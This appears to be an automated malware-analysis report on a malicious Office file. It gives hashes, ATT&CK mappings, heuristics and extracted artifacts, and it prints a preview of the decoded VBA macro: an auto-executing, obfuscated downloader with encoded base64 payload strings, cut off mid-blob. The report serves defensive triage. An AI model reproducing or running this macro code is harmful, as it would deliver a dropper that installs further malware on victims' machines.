Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 607f4ba1739f9f47…

MALICIOUS

Office (OOXML)

Size: 15.6 KB
First seen: 2021-09-17
MD5: 9a59dd1bc60d74e8e1eb9bf48567c404
SHA-1: 7ffe6a902640aaf59040a1fc53eee7db96e12290
SHA-256: 607f4ba1739f9f47422f6bf9f7baf8e6faafa2e03eb158767d8372ec3382de10
Risk Score: 322

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1218.011 Signed Binary Proxy Execution: Rundll32
  • T1071.001 Application Layer Protocol: Web Protocols
  • T1105 Ingress Tool Transfer

The sample contains obfuscated VBA macros with an Auto_open subroutine designed to execute malicious code. It heavily utilizes WScript.Shell and CreateObject to run commands, indicating an intent to download and execute a second-stage payload. The obfuscation and use of shell execution point towards a downloader or dropper functionality.

Heuristics 8

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 5619 bytes
SHA-256: c80b0931e9570736f5396ea6db493fb0c93de8f03082082d0166c2fe941daba1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "egler"

Public Sub Auto_open()
fr.xv
fddgd = sdfs

End Sub

Attribute VB_Name = "fr"
Sub xv()
iary = nbmnjk(223) & nbmnjk(201) & nbmnjk(192) & nbmnjk(156) & nbmnjk(171) & nbmnjk(191) & nbmnjk(156) & nbmnjk(204) & nbmnjk(203) & nbmnjk(218) & nbmnjk(243) & nbmnjk(218) & nbmnjk(225) & nbmnjk(206) & nbmnjk(239) & nbmnjk(218) & nbmnjk(228) & nbmnjk(225) & nbmnjk(218) & nbmnjk(232) & nbmnjk(232) & nbmnjk(156) & nbmnjk(169) & nbmnjk(193) & nbmnjk(156)
iary = iary & "WQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEgASQBBAFkAdwBCAGwAQQBHAE0AQQBjAHcAQgB0AEEARwBNAEEAYwB3AEIAbgBBAEgAbwBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgBtAEEASABvAEEAYQBRAEIAdwBBAEcAZwBBAGQAQQBCAHYAQQBHADAAQQBlAGcAQgB1AEEARwB3AEEAZQBRAEIAawBBAEcAYwBBAFoAUQBBAGcAQQBDAHcAQQBJAEEAQQBrAEEASABNAEEAWgBRAEIAeABBAEcAUQBBAGQAZwBCADQAQQBIAGcAQQBaAFEAQgBrAEEARwBzAEEAWQBRAEIAcgBBAEcAbwBBAGMAQQBCAHEAQQBHAG8AQQBkAGcAQgBtAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAYwBnAEIAVQBBAEMAMABBAFQAUQBCAHYAQQBFAFEAQQBWAFEAQgBNAEEARwBVAEEASQBBAEIAQwBBAEUAawBBAGQAQQBCAFQAQQBIAFEAQQBVAGcA"
iary = iary & "QgBoAEEARQA0AEEAYwB3AEIARwBBAEcAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBWAEEAQgB6AEEARgBRAEEAYwBnAEIAQgBBAEcANABBAGMAdwBCAG0AQQBFAFUAQQBVAGcAQQBnAEEAQwAwAEEAVQB3AEIAUABBAEYAVQBBAFUAZwBCAGoAQQBFAFUAQQBJAEEAQQBrAEEARwBZAEEAZQBnAEIAcABBAEgAQQBBAGEAQQBCADAAQQBHADgAQQBiAFEAQgA2AEEARwA0AEEAYgBBAEIANQBBAEcAUQBBAFoAdwBCAGwAQQBDAEEAQQBMAFEAQgBFAEEARwBVAEEAVQB3AEIAMABBAEcAawBBAFQAZwBCAGgAQQBIAFEAQQBTAFEAQgBQAEEARwA0AEEASQBBAEEAawBBAEgATQBBAFoAUQBCAHgAQQBHAFEAQQBkAGcAQgA0AEEASABnAEEAWgBRAEIAawBBAEcAcwBBAFkAUQBCAHIAQQBHAG8AQQBjAEEAQgBxAEEARwBvAEEAZABnAEIAbQBBAEQA"
iary = iary & "TQBBAFoAdwBCADYAQQBDAEEAQQBKAHcAQgBvAEEASABRAEEAZABBAEIAdwBBAEgATQBBAE8AZwBBAHYAQQBDADgAQQBjAHcAQgB2AEEARwBrAEEAZABBAEIAaABBAEcARQBBAFkAZwBBAHUAQQBHAE0AQQBiAHcAQQB2AEEARQBRAEEAZABBAEIAegBBAEcAawBBAGEAQQBCADYAQQBHAGMAQQBlAEEAQgBqAEEARwBVAEEAWgBBAEIAdABBAEgAbwBBAFoAQQBCAGwAQQBIAGsAQQBiAEEAQgB3AEEARwA4AEEAZABBAEIAdwBBAEcAYwBBAFkAZwBCAHMAQQBHADQAQQBjAHcAQgA0AEEASABNAEEAZQBRAEIAdABBAEcAOABBAFkAUQBCAHkAQQBIAFUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHgAQQBHAHc
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: ppt/vbaProject.bin
Size: 38400 bytes
SHA-256: b18021571353f2c75de54c87db609958e612cc89c4f8936a23873b81ebcdcf07
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).